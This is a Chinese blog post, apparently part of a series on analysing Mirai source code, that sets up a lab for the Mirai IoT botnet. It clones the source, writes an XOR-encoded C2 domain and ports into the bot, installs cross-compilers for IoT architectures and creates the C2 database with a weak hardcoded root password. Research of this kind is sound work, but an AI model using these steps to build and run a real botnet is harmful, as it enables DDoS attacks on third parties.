<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"oneshell.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":true,"nav":{"gitalk":{"order":-2}},"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="实验环境说明实验环境所使用到的虚拟机都是Ubuntu 20.04 LTS，在设置cnc的数据库时需要对账号和密码进行相关的配置。局域网的路由器是OpenWrt，可以直接在路由器上配置DNS，将cnc的域名设置为mirai.cnc。 mirai-cnc：  IP：172.16.0.101 arch：x86&#x2F;64 domain：mirai.cnc sys：Ubuntu 20.04 LTS">
<meta property="og:type" content="article">
<meta property="og:title" content="mirai源码分析：运行环境搭建">
<meta property="og:url" content="https://oneshell.top/2022/11/30/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/index.html">
<meta property="og:site_name" content="OneShell">
<meta property="og:description" content="实验环境说明实验环境所使用到的虚拟机都是Ubuntu 20.04 LTS，在设置cnc的数据库时需要对账号和密码进行相关的配置。局域网的路由器是OpenWrt，可以直接在路由器上配置DNS，将cnc的域名设置为mirai.cnc。 mirai-cnc：  IP：172.16.0.101 arch：x86&#x2F;64 domain：mirai.cnc sys：Ubuntu 20.04 LTS">
<meta property="og:locale">
<meta property="og:image" content="https://oneshell.top/images/Pastedimage20221222104030.png">
<meta property="og:image" content="https://oneshell.top/images/Pastedimage20221222155435.png">
<meta property="article:published_time" content="2022-11-30T03:33:46.000Z">
<meta property="article:modified_time" content="2023-02-07T04:50:32.069Z">
<meta property="article:author" content="OneShell">
<meta property="article:tag" content="mirai">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://oneshell.top/images/Pastedimage20221222104030.png">

<link rel="canonical" href="https://oneshell.top/2022/11/30/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>mirai源码分析：运行环境搭建 | OneShell</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">OneShell</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">blog of oneshell</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>Schedule</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://oneshell.top/2022/11/30/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="OneShell">
      <meta itemprop="description" content="stay hungry, stay foolish">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="OneShell">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          mirai源码分析：运行环境搭建
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-11-30 11:33:46" itemprop="dateCreated datePublished" datetime="2022-11-30T11:33:46+08:00">2022-11-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-02-07 12:50:32" itemprop="dateModified" datetime="2023-02-07T12:50:32+08:00">2023-02-07</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Log/" itemprop="url" rel="index"><span itemprop="name">Log</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="实验环境说明"><a href="#实验环境说明" class="headerlink" title="实验环境说明"></a>实验环境说明</h2><p>实验环境所使用到的虚拟机都是Ubuntu 20.04 LTS，在设置cnc的数据库时需要对账号和密码进行相关的配置。局域网的路由器是OpenWrt，可以直接在路由器上配置DNS，将cnc的域名设置为mirai.cnc。</p>
<p>mirai-cnc：</p>
<ul>
<li>IP：172.16.0.101</li>
<li>arch：x86&#x2F;64</li>
<li>domain：mirai.cnc</li>
<li>sys：Ubuntu 20.04 LTS</li>
</ul>
<p>mirai-client1：</p>
<ul>
<li>IP：172.16.0.20</li>
<li>arch：x86&#x2F;64</li>
<li>sys：Ubuntu 20.04 LTS</li>
</ul>
<p>mirai-client2：</p>
<ul>
<li>IP：172.16.0.21</li>
<li>arch：x86&#x2F;64</li>
<li>sys：Ubuntu 20.04 LTS</li>
</ul>
<h2 id="局域网设置DNS解析"><a href="#局域网设置DNS解析" class="headerlink" title="局域网设置DNS解析"></a>局域网设置DNS解析</h2><p>在实验的时候，如果有条件的可以使用公网IP+域名，没有条件的可以在局域网下面自行搭建一个DNS服务器，或者有些路由器上支持局域网内做域名劫持+解析进行配置。<br>我是在172.16.0.0&#x2F;24局域网下使用刷了OpenWrt的斐讯路由器K2进行局域网下域名解析的，解析配置以及结果如下：<br><img src="/images/Pastedimage20221222104030.png" alt="undifined"><br>使用mirai-client1去ping cnc：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-client1 in ~ [2:47:52]</span><br><span class="line">$ ping mirai.cnc</span><br><span class="line">PING mirai.cnc (172.16.0.101) 56(84) bytes of data.</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=1 ttl=64 time=0.250 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=2 ttl=64 time=0.556 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=3 ttl=64 time=0.176 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=4 ttl=64 time=0.133 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=5 ttl=64 time=0.146 ms</span><br></pre></td></tr></table></figure>
<p>使用mirai-client2去ping cnc：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># utest @ marai-client2 in ~ [2:50:22]</span><br><span class="line">$ ping mirai.cnc</span><br><span class="line">PING mirai.cnc (172.16.0.101) 56(84) bytes of data.</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=1 ttl=64 time=0.250 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=2 ttl=64 time=0.245 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=3 ttl=64 time=0.205 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=4 ttl=64 time=0.320 ms</span><br><span class="line">64 bytes from pdc-ubuntu.lan (172.16.0.101): icmp_seq=5 ttl=64 time=0.340 ms</span><br></pre></td></tr></table></figure>
<p>至此，网络环境就算搭建好了。</p>
<h2 id="mirai-cnc配置"><a href="#mirai-cnc配置" class="headerlink" title="mirai-cnc配置"></a>mirai-cnc配置</h2><p>编译mirai的任务我是放在mirai-cnc上，其使用到了C、GO两种语言，cnc使用到了数据库来保存控制账号、攻击历史等信息，因此需要安装必备的软件。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install git gcc golang electric-fence mysql-server mysql-client</span><br></pre></td></tr></table></figure>
<p>下载源码：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/jgamblin/Mirai-Source-Code</span><br></pre></td></tr></table></figure>
<h3 id="设置cnc回连加密"><a href="#设置cnc回连加密" class="headerlink" title="设置cnc回连加密"></a>设置cnc回连加密</h3><p>mirai bot中的cnc地址和扫描结果返回地址是硬编码到源码中的加密数据，因此需要先编译加密模块，然后通过加密模块得到加密后的地址，并写入到mirai bot源码中。<br>进入路径<code>mirai/tools</code>，使用gcc编译即可：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai/tools on git:comments x [19:16:33]</span><br><span class="line">$ gcc enc.c -o enc.out</span><br><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai/tools on git:comments x [19:16:43]</span><br><span class="line">$ ./enc.out</span><br><span class="line">Usage: ./enc.out &lt;string | ip | uint32 | uint16 | uint8 | bool&gt; &lt;data&gt;</span><br></pre></td></tr></table></figure>
<p>计算加密后的cnc域名和扫描成功结果返回域名，我是将二者都设置为同一个地址<code>mirai.cnc</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai/tools on git:comments x [19:16:49]</span><br><span class="line">$ ./enc.out string mirai.cnc</span><br><span class="line">XOR&#x27;ing 10 bytes of data...</span><br><span class="line">\x4F\x4B\x50\x43\x4B\x0C\x41\x4C\x41\x22</span><br></pre></td></tr></table></figure>
<p>将其写入到mirai木马的源码<code>./mirai/bot/table.c</code>中，如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">table_init</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    add_entry(TABLE_CNC_DOMAIN, <span class="string">&quot;\x4F\x4B\x50\x43\x4B\x0C\x41\x4C\x41\x22&quot;</span>, <span class="number">11</span>); <span class="comment">// mirai.cnc</span></span><br><span class="line">    add_entry(TABLE_CNC_PORT, <span class="string">&quot;\x22\x35&quot;</span>, <span class="number">2</span>);   <span class="comment">// 23</span></span><br><span class="line"></span><br><span class="line">    add_entry(TABLE_SCAN_CB_DOMAIN, <span class="string">&quot;\x4F\x4B\x50\x43\x4B\x0C\x41\x4C\x41\x22&quot;</span>, <span class="number">11</span>); <span class="comment">// mirai.cnc</span></span><br><span class="line">    add_entry(TABLE_SCAN_CB_PORT, <span class="string">&quot;\x99\xC7&quot;</span>, <span class="number">2</span>);         <span class="comment">// 48101</span></span><br><span class="line"></span><br><span class="line">    add_entry(TABLE_EXEC_SUCCESS, <span class="string">&quot;\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22&quot;</span>, <span class="number">15</span>);</span><br></pre></td></tr></table></figure>
<h3 id="配置交叉编译"><a href="#配置交叉编译" class="headerlink" title="配置交叉编译"></a>配置交叉编译</h3><p>mirai木马通常是针对IoT设备的，因此需要先构建交叉编译环境，以编译不同架构的木马。mirai源码中有推荐使用<a target="_blank" rel="noopener" href="https://pastebin.com/1rRCc3aD">该地址</a>的脚本来安装交叉编译环境，我是将交叉编译器放置到了mirai的源码目录中。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">mkdir cross-compile-bin</span><br><span class="line">cd cross-compile-bin</span><br><span class="line"></span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2</span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2</span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2</span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2</span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2</span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2</span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2</span><br><span class="line">wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2</span><br><span class="line"> </span><br><span class="line">tar -jxf cross-compiler-armv4l.tar.bz2</span><br><span class="line">tar -jxf cross-compiler-i586.tar.bz2</span><br><span class="line">tar -jxf cross-compiler-m68k.tar.bz2</span><br><span class="line">tar -jxf cross-compiler-mips.tar.bz2</span><br><span class="line">tar -jxf cross-compiler-mipsel.tar.bz2</span><br><span class="line">tar -jxf cross-compiler-powerpc.tar.bz2</span><br><span class="line">tar -jxf cross-compiler-sh4.tar.bz2</span><br><span class="line">tar -jxf cross-compiler-sparc.tar.bz2</span><br><span class="line"> </span><br><span class="line">rm *.tar.bz2</span><br><span class="line">mv cross-compiler-armv4l armv4l</span><br><span class="line">mv cross-compiler-i586 i586</span><br><span class="line">mv cross-compiler-m68k m68k</span><br><span class="line">mv cross-compiler-mips mips</span><br><span class="line">mv cross-compiler-mipsel mipsel</span><br><span class="line">mv cross-compiler-powerpc powerpc</span><br><span class="line">mv cross-compiler-sh4 sh4</span><br><span class="line">mv cross-compiler-sparc sparc</span><br></pre></td></tr></table></figure>
<p>目录结构如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/cross-compile-bin on git:comments x [22:08:42]</span><br><span class="line">$ tree -L 1</span><br><span class="line">.</span><br><span class="line">├── armv4l</span><br><span class="line">├── i586</span><br><span class="line">├── m68k</span><br><span class="line">├── mips</span><br><span class="line">├── mipsel</span><br><span class="line">├── powerpc</span><br><span class="line">├── sh4</span><br><span class="line">└── sparc</span><br><span class="line"></span><br><span class="line">8 directories, 0 files</span><br></pre></td></tr></table></figure>
<p>然后将交叉编译器所在的路径添加到shell配置文件中，我是使用的zsh，则<code>～/.zshrc</code>，bash则是<code>~/.bashrc</code>，配置完成后需要<code>source</code>一下配置文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/armv4l/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/armv6l/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/i586/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/m68k/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/mips/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/mipsel/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/powerpc/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/powerpc-440fp/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/sh4/bin</span><br><span class="line">export PATH=$PATH:/home/utest/app/Mirai-Source-Code/cross-compile-bin/sparc/bin</span><br></pre></td></tr></table></figure>

<p>正式的编译工作还需要等数据库配置完毕后才能进行，因为cnc还需要连接到数据库。</p>
<h3 id="数据库配置"><a href="#数据库配置" class="headerlink" title="数据库配置"></a>数据库配置</h3><p>mirai的作者是使用了一台单独的数据库服务器，我是将数据库服务运行在<code>mirai.cnc</code>上的，在实际场景中数据库可以运行在任意一台服务器上，只要保证能够被连接上。<br>在mirai源码中的<code>scripts/db.sql</code>中添加一行<code>USE mirai</code>如下，其作用是创建数据库<code>mirai</code>，创建表<code>history</code>，创建表<code>users</code>，创建表<code>writelist</code>：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">CREATE</span> DATABASE mirai;</span><br><span class="line">USE mirai; </span><br><span class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> `history` (</span><br><span class="line">  `id` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span> AUTO_INCREMENT,</span><br><span class="line">  `user_id` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `time_sent` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `duration` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `command` text <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `max_bots` <span class="type">int</span>(<span class="number">11</span>) <span class="keyword">DEFAULT</span> <span class="string">&#x27;-1&#x27;</span>,</span><br><span class="line">  <span class="keyword">PRIMARY</span> KEY (`id`),</span><br><span class="line">  KEY `user_id` (`user_id`)</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> `users` (</span><br><span class="line">  `id` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span> AUTO_INCREMENT,</span><br><span class="line">  `username` <span class="type">varchar</span>(<span class="number">32</span>) <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `password` <span class="type">varchar</span>(<span class="number">32</span>) <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `duration_limit` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">DEFAULT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `cooldown` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `wrc` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">DEFAULT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `last_paid` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `max_bots` <span class="type">int</span>(<span class="number">11</span>) <span class="keyword">DEFAULT</span> <span class="string">&#x27;-1&#x27;</span>,</span><br><span class="line">  `admin` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">DEFAULT</span> <span class="string">&#x27;0&#x27;</span>,</span><br><span class="line">  `intvl` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">DEFAULT</span> <span class="string">&#x27;30&#x27;</span>,</span><br><span class="line">  `api_key` text,</span><br><span class="line">  <span class="keyword">PRIMARY</span> KEY (`id`),</span><br><span class="line">  KEY `username` (`username`)</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> `whitelist` (</span><br><span class="line">  `id` <span class="type">int</span>(<span class="number">10</span>) unsigned <span class="keyword">NOT</span> <span class="keyword">NULL</span> AUTO_INCREMENT,</span><br><span class="line">  `prefix` <span class="type">varchar</span>(<span class="number">16</span>) <span class="keyword">DEFAULT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  `netmask` tinyint(<span class="number">3</span>) unsigned <span class="keyword">DEFAULT</span> <span class="keyword">NULL</span>,</span><br><span class="line">  <span class="keyword">PRIMARY</span> KEY (`id`),</span><br><span class="line">  KEY `prefix` (`prefix`)</span><br><span class="line">);</span><br></pre></td></tr></table></figure>
<p>启动数据库，并执行上述的数据库脚本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code on git:comments x [22:24:04]</span><br><span class="line">$ sudo mysql -u root</span><br><span class="line">mysql&gt; source ./scripts/db.sql</span><br><span class="line">Query OK, 1 row affected (0.01 sec)</span><br><span class="line"></span><br><span class="line">Database changed</span><br><span class="line">Query OK, 0 rows affected, 5 warnings (0.06 sec)</span><br><span class="line"></span><br><span class="line">Query OK, 0 rows affected, 8 warnings (0.01 sec)</span><br><span class="line"></span><br><span class="line">Query OK, 0 rows affected, 2 warnings (0.01 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt;</span><br></pre></td></tr></table></figure>
<p>在刚才的mysql界面中添加一个用户，用来登陆cnc：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; INSERT INTO users VALUES (NULL, &#x27;mirai-user&#x27;, &#x27;mirai-password&#x27;, 0, 0, 0, 0, -1, 1, 30, &#x27;&#x27;);</span><br><span class="line">Query OK, 1 row affected (0.01 sec)</span><br></pre></td></tr></table></figure>
<p>修改数据库root账号的登录权限。在Ubuntu的mysql默认设置下不能使用root账号连接到服务器，因此需要稍微修改root账号的权限。在实际的运用场景中也可以新建另外的一个数据库账号，然后将数据库<code>mirai</code>的相关权限分配给该账号。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; ALTER USER &#x27;root&#x27;@&#x27;localhost&#x27; IDENTIFIED WITH mysql_native_password BY &#x27;123123&#x27;;</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; FLUSH PRIVILEGES;</span><br><span class="line">Query OK, 0 rows affected (0.00 sec)</span><br></pre></td></tr></table></figure>
<p>此时数据库的配置就完成了，可以得到如下的配置，并将其写入到cnc代码<code>mirai/cnc/main.go</code>中：</p>
<ul>
<li>账号：root</li>
<li>密码：123123</li>
<li>地址：127.0.0.1<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> DatabaseAddr <span class="type">string</span>   = <span class="string">&quot;127.0.0.1&quot;</span></span><br><span class="line"><span class="keyword">const</span> DatabaseUser <span class="type">string</span>   = <span class="string">&quot;root&quot;</span></span><br><span class="line"><span class="keyword">const</span> DatabasePass <span class="type">string</span>   = <span class="string">&quot;123123&quot;</span></span><br><span class="line"><span class="keyword">const</span> DatabaseTable <span class="type">string</span>  = <span class="string">&quot;mirai&quot;</span></span><br></pre></td></tr></table></figure></li>
</ul>
